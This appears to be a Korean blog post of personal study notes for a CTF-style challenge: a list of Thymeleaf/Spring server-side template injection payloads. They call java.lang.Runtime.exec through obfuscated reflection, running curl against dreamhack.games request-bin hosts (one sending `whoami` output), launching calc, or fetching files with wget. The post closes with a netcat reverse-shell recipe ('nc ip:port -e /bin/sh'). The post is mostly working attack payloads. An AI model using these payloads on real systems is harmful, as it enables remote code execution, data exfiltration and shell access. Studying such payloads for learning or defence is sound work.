__${1111+2222}__::.x
__${'abccc'.toUPPERCASE()}__::.x
__${getRuntime().exec(curl 'https://ckgmkdp.request.dreamhack.games')}__::.x
__${T(java.lang.Runtime).getRuntime().exec('id')}__::.x
__${(1).Class.forName('ja'+'va.lang.Runt'+'ime').getRuntime().exec('curl https://xltlspf.request.dreamhack.games')}__::.x
[_${(1).TYPE.forName('ja'+'va.lang.Runt'+'ime')...}__], template might not exist or might not be accessible by any of the configured Template Resolvers
Invalid template name specification: '__${(1).TYPE.forName('ja'+'va.lang.Runt'+'ime')...}__::.x/underconstruction'
__${(1).TYPE.forName('ja'+'va.lang.Runt'+'ime').getMethod('getRun'+'time',null).invoke(null,null).exec('curl https://tools.dreamhack.games/requestbin/ckgmkdp/`whoami`').waitFor()...}__::.x
__${(1).TYPE.forName('ja'+'va.lang.Runt'+'ime').methods[6].invoke(null,null).exec('curl https://auuyvrz.request.dreamhack.games').inputStream.readAllBytes() }__::.x
__${(1).TYPE.forName('java.lang.Runtime').methods[6].invoke(null,null).exec('curl https://bxtqvye.request.dreamhack.games').inputStream.readAllBytes()__::.x
__${(1).TYPE.forName('ja'+'va.lang.Runt'+'ime').constructors[0].newInstance(([bytes]).toArray())}__::.x
__${(1).Class.forName('ja'+'va.lang.Runt'+'ime').getMethod('exec', new Class[]{String.class});
__${(1).TYPE.forName('ja'+'va.lang.Runt'+'ime').getMethod('getRun'+'time',null).invoke(null,null).exec('curl https://xltlspf.request.dreamhack.games/`whoami`').waitFor()...}
__${(1).TYPE.forName('ja'+'va.lang.Runt'+'ime').getMethod('getRun'+'time').exec(curl\u205Fhttps://ohuncri.request.dreamhack.games)}__::.x__::.x
__${(1).TYPE.forName('ja'+'va.lang.Runt'+'ime').getMethod('getRun'+'time')}__::.x
__${(1).TYPE.forName('ja'+'va.lang.Runt'+'ime').getDeclaredMethod('getRun'+'time').exec(new String[]{'curl','https://gyaekrn.request.dreamhack.games'})}__::.x
''.class.forName('java.lang.Runtime').getRuntime().exec('calc.exe')
__${(1).TYPE.forName('ja'+'va.lang.Runt'+'ime').getMethod('getRun'+'time').invoke().exec('curl https://puqvukh.request.dreamhack.games')}__::.x
T(String).getClass().forName('java.la'%2b'ng.Runtime').getMethod('getRu'%2b'ntime').invoke(null).getClass().getMethod('ex'%2b'ec',T(String)).invoke(T(java.lang.Runtime).getRuntime(),'calc')
__${(1).TYPE.forName('ja'+'va.lang.Runt'+'ime').getMethod('getRun'+'time').invoke(null).getClass().getMethod('exec').invoke('curl'+''+'https://yymxdsb.request.dreamhack.games')}__::.x
__${(1).TYPE.forName('ja'+'va.lang.Runt'+'ime').getMethod('getRun'+'time').invoke().getClass().getMethod('exec',T(String)).invoke((1).TYPE.forName('ja'+'va.lang.Runt'+'ime').getMethod('getRun'+'time'),'curl https://rvoyfql.request.dreamhack.games')}__::.x
__${(1).TYPE.forName('ja'+'va.lang.Runt'+'ime').getMethod('getRun'+'time').invoke(null).exec('calc')}__::.x
__${(1).TYPE.forName('ja'+'va.lang.Runt'+'ime').getMethod('getRun'+'time').invoke(null).exec('open%20https://mesgcyd.request.dreamhack.games')}__::.x
__${(1).TYPE.forName('ja'+'va.lang.Runt'+'ime').getMethod('getRun'+'time').invoke(null).exec(new%20String[]{'curl'%2c'-POST'%2c'-H'%2c'Content-Type:multipart/form-data'%2c'-k'%2c'https://fvnbfqn.request.dreamhack.games'})}__::.x
__${(1).TYPE.forName('ja'+'va.lang.Runt'+'ime').getMethod('getRun'+'time').invoke(null).exec('wget%20-b%20http://curl.haxx.se/download/curl-7.40.0.tar.gz')}__::.x
__${(1).TYPE.forName('ja'+'va.lang.Runt'+'ime').getMethod('getRun'+'time').invoke(null).exec('cd%20curl-7.40.0')}__::.xnc -lvp 포트로 내컴터에서열고
nc ip:포트 -e /bin/sh로 내컴터로연결
'웹' 카테고리의 다른 글
| WACon2022-Kuncɛlan 공부 (4) | 2022.06.29 |
|---|---|
| SSTI 문서 (0) | 2022.06.23 |
| node-redis Bug case (1) | 2022.06.20 |
| mysql error based injection 잘 되어 있는 곳 (2) | 2022.06.14 |
| 한글 blind sqlinjection (0) | 2022.06.13 |
